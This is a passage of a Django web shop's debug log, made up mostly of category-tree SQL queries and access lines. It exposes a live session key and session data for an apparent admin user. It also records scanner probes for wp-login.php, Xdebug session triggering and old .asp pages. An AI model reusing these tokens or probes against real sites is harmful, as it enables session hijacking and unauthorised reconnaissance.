"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:27:34,773 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:27:34,775 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:27:34,777 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:27:34,779 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:27:34,782 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:27:34,786 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:27:34,789 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:27:34,791 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:27:34,794 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:27:34,797 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:27:34,799 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:27:34,802 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:27:34,804 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:27:34,807 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:27:34,809 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:27:34,811 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:27:34,814 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:27:34,817 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:27:34,819 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:27:34,821 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:27:34,823 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:27:34,827 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:27:34,830 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:27:34,832 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:27:34,834 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:27:34,836 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:27:34,838 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:27:34,844 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:27:34,847 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:27:34,850 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:27:34,855 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:27:34,858 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:27:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:31:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:37:26] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:42:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:47:58] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:53:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 21:55:33,528 utils 2749 140297243715328 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:55:33.513591+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 55, 33, 513591, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:55:33,532 utils 2749 140297243715328 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:55:33,581 utils 2749 140297243715328 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:55:33,595 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:55:33.592871+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 55, 33, 592871, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:55:33] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:55:37,737 utils 2749 140297243715328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:55:37.728041+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 55, 37, 728041, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:55:37,740 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:55:37,782 utils 2749 140297243715328 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:55:37,795 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:55:37.793174+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 55, 37, 793174, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:55:37] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:55:42,576 utils 2749 140297243715328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:55:42.567245+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 55, 42, 567245, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:55:42,578 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:55:42,607 utils 2749 140297243715328 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:55:42,615 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:55:42.613681+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 55, 42, 613681, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:55:42] "GET / HTTP/1.0" 200 8208 [31/Dec/2019 21:58:51] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:03:52] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:09:23] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:11:12] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:12:42] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:14:34] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:19:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:26:37] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:29:16] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-31 22:29:17,933 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '04hjfhd2u11b884olfpkytk8xkmyla5g' LIMIT 1; args=('04hjfhd2u11b884olfpkytk8xkmyla5g',) DEBUG 2019-12-31 22:29:17,935 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('04hjfhd2u11b884olfpkytk8xkmyla5g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T22:29:17.933921+00:00'::timestamptz); args=('04hjfhd2u11b884olfpkytk8xkmyla5g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 22, 29, 17, 933921, tzinfo=)) [31/Dec/2019 22:29:17] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [31/Dec/2019 22:31:40] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:36:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 22:41:46] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [31/Dec/2019 22:42:20] "GET /wp-login.php HTTP/1.0" 404 6346 Not Found: /robots.txt [31/Dec/2019 22:45:48] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [31/Dec/2019 22:45:50] "GET /dyzl/Print.asp?ArticleID=304 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [31/Dec/2019 22:45:52] "GET /xyzx/SendMail.asp?ArticleID=368 HTTP/1.0" 404 6376 DEBUG 2019-12-31 22:46:57,830 utils 2749 140297243715328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T22:46:57.821973+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 22, 46, 57, 821973, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 22:46:57,833 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 22:46:57,862 utils 2749 140297243715328 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 22:46:57,871 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T22:46:57.869497+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; 